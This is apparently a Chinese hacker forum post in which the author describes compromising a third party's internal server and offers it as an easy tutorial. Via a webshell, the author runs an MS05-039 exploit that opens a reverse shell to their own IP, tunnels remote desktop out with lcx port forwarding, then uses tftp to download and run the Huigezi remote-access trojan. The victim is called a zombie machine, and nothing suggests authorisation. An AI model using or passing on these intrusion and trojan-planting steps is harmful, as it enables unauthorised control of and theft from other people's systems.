最近一直为了拿不到服务器而郁闷。自己菜！
上次拿到过两个都是下载pcanywhere里面的cif文件然后用pcanywhere连的。

看了邪恶的原创贴>MS05-039××，然后就学会了。
就马上去Webshell里面测试下。

首先把Ms05039漏洞利用程序传上去。


然后选择WScriptshell程序运算器。点击WScriptshell
然后Ms05039 127.0.0.1(服务器保留IP) 219.144.177.19 2105(我监听的端口)

在本地监听2105端口

点击运行

终于反弹成功（看图）


别高兴太早了。BT了吧，内网服务器。。。郁闷吧


也别泄气啊，这不，我早就把把lcx传到webshell上去了。
××:“lcx是啥啊？
晕，你连xingxuexin老大的动画都不看，咋混啊？
第八课里面讲得够仔细了。。。
先在本地监听51转8899 lcx -listen 51 8899

。××:"为啥是8899啊？"它的远程终端是8899哦

然后到在cmdshell下面运行lcx -slave 219.144.177.19 51  172.16.2.10 8899
这条命令的意思是将内网肉鸡的8899端口转发到本机的51上来。


然后敲击回车，打开MSTSC.EXE连接本机8899端口。


看到没有连接上了



由于服务器是网通的，还是内网的，汗×
所以远程桌面卡得很
本来架设ftp呢！连接后假死状态。然后经过xingxuexin老大的执教，
就架设了tftp
然后在cmdshell下面运行tftp -i 我的IP get 灰鸽子服务端.exe
等了半个小时吧，服务端传完了。
然后运行了..............

然后老大吩咐我做动画，乖乖我的CPU1.7内网256，估计整不了啊。
准备做动画的突然发现ms05039反弹不了了。
[+] Trying to connect to remote port on127.0.0.1:445...ESTABLISHED
[+] Making null session...
[!] Failed to get responding data
不知道为啥？


郁闷啊，后来发现管理员没在啊，应该。郁闷ing


这次拿服务器算是完成篇吧
很简单的，没什么技术的，应该一看就会了。吧。。。

就到这里了。。。。希望大家技术>Beter and Beter